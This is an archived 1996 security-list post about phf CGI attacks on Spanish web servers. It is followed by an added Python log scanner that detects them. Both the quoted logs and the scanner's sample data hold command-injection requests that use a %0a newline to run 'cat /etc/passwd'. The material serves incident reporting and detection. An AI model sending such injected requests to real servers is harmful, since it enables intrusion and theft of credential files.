[2946] in WWW Security List Archive
'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Jordi "Matemàtic" Salvat)
Mon Sep 16 18:51:23 1996
Date: Mon, 16 Sep 1996 22:20:45 -0100
From: "Jordi \"Matemàtic\" Salvat" <jordi@webarna.com>
To: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
Many Spanish ISPs are receiving attack attempts on their WWW servers...
they detect them on their log files in entries such as:
info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
Obviously attempting to get the passwd file.
What is curious about these attacks is that they all come from different
dial-up providers, from users apparently scattered throughout Spain.
Maybe an "organized" group who meets and exchanges ideas over the I-net?
There have also been a few attempts apparently coming from the US. Of
course most providers have initiated action to find out who those
cracker-apprentices are, and warn them that what they are doing is a
delict under the new Spanish Penal Laws.
At least one of these attacks has been successful. The hacker then
reportedly managed to find out the root password (bad password choice?) and
replaced the getty and getty to leave a 'backdoor'. The hacker was
reportedly invisible to 'who' and 'last', so the only way to know
whether he was logged in was to look at the process list.
Does anyone know what this 'phf' cgi-bin is supposed to be?
Thanks for your help.
--
Jordi Salvat i Alabart
Web Edicions Barcelona
edicions i consultoria Internet
http://www.webarna.com
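The following is an added example, not part of Jordi's message or the list archive: a small Python scanner that reads Common Log Format entries like the ones quoted above, percent-decodes the query string, and flags phf requests whose parameter carries a newline or another shell metacharacter, which is the signature of this attack (phf was a sample phone-book CGI shipped with NCSA httpd and early Apache, and its input filter let a newline through, so whatever followed %0a reached the shell). A 404 means the server had no phf to run; a 200 on such a request deserves the follow-up the message describes. The log lines in the block are constructed, modelled on the quoted entries, with placeholder hostnames.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log, modelled on the entries quoted in the message.
# Hostnames are placeholders; the third and fourth lines are added to show
# a legitimate lookup and a request that the server actually answered.
SAMPLE_LOG = """\
host1.example - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
host2.example - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
host3.example - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
host4.example - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
host5.example - - [12/Sep/1996:20:18:00 +0100] "GET /index.html HTTP/1.0" 200 2048
"""

# Common Log Format: host ident user [time] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Characters that let user input escape from a single shell argument.
# The newline is first on purpose: that is the one phf failed to strip.
SHELL_META_RE = re.compile(r'[\n\r;|&`]')


def parse_clf(line):
    """Return the CLF fields of one access-log line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect_phf(line):
    """Return a finding for a phf request carrying a shell metacharacter, else None."""
    rec = parse_clf(line)
    if rec is None:
        return None
    url = urlsplit(rec['target'])
    if not url.path.endswith('/cgi-bin/phf'):
        return None
    # parse_qsl percent-decodes, so %0a becomes a real newline and %20 a space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        hit = SHELL_META_RE.search(value)
        if hit is None:
            continue
        return {
            'host': rec['host'],
            'time': rec['time'],
            'status': rec['status'],
            'param': name,
            'metachar': hit.group(0),
            # Whatever follows the metacharacter is what the shell would have run.
            'injected': value[hit.end():].strip(),
            # 404: no phf on this server. 200: phf ran and answered; investigate.
            'verdict': 'possible success' if rec['status'] == '200' else 'attempt',
        }
    return None


def scan(log_text):
    """Run inspect_phf over every line and keep the findings."""
    return [f for f in map(inspect_phf, log_text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} status={f['status']} "
              f"{f['verdict']}: {f['param']} -> {f['injected']!r}")
```

Feed the real access log to `scan()` instead of `SAMPLE_LOG`; any finding with verdict "possible success" is the case to treat as a compromise until the host is checked, since, as the message notes, a successful phf request is followed by work the attacker does on the box itself.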